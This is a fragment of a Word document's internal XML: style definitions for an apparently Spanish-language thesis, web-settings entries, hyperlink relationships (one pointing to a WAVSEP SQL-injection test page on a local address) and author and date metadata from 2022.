    <w:uiPriority w:val="49"/>
    <w:rsid w:val="00E702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esisUnir">
    <w:name w:val="TesisUnir"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="TesisUnirCar"/>
    <w:qFormat/>
    <w:rsid w:val="005F2B55"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
      <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Georgia" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Georgia"/>
      <w:bCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="es-ES_tradnl" w:eastAsia="es-ES"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="Tablaconcuadrcula">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="Tablanormal"/>
    <w:uiPriority w:val="59"/>
    <w:rsid w:val="005F2B55"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>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s">
    <w:name w:val="Tablas"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="TablasCar"/>
    <w:qFormat/>
    <w:rsid w:val="005F2B55"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="4"/>
      </w:numPr>
      <w:spacing w:before="360" w:after="360" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="360"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Georgia" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Georgia" w:cstheme="minorBidi"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US" w:eastAsia="es-ES"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TablasCar">
    <w:name w:val="Tablas Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Tablas"/>
    <w:rsid w:val="005F2B55"/>
    <w:rPr>
      <w:rFonts w:ascii="Georgia" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Georgia"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="es-ES"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Fuente">
    <w:name w:val="Fuente"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FuenteCar"/>
    <w:qFormat/>
    <w:rsid w:val="005F2B55"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
      <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Georgia" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Georgia"/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="es-ES_tradnl" w:eastAsia="es-ES"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TesisUnirCar">
    <w:name w:val="TesisUnir Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="TesisUnir"/>
    <w:rsid w:val="005F2B55"/>
    <w:rPr>
      <w:rFonts w:ascii="Georgia" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Georgia" w:cs="Calibri"/>
      <w:bCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="es-ES_tradnl" w:eastAsia="es-ES"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FuenteCar">
    <w:name w:val="Fuente Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Fuente"/>
    <w:rsid w:val="005F2B55"/>
    <w:rPr>
      <w:rFonts w:ascii="Georgia" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Georgia" w:cs="Calibri"/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="es-ES_tradnl" w:eastAsia="es-ES"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hipervnculo">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007649DA"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Mencinsinresolver">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007649DA"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hipervnculovisitado">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007E53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005">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="927084662">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1150823277">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1164013200">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1565872949">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1627273581">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="163560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Ma_ADxzAZWksAam_nIseRP6wTlc1LxM-/view?usp=shari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92.168.2.101:8080/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-200Error/Case02-InjectionInSearch-String-UnionExploit-With200Errors.jsp" TargetMode="External"/><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drive.google.com/file/d/1Iv5TxKbQIwQNM1i6MXOgSHx30rkz92HT/view?usp=shar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25</Pages>
  <Words>2991</Words>
  <Characters>16451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Paz</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Angel Paz</cp:lastModifiedBy>
  <cp:revision>30</cp:revision>
  <cp:lastPrinted>2022-07-15T00:18:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-07-14T02:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-07-15T01:23:00Z</dcterms:modified>
</cp:coreProperties>
</file>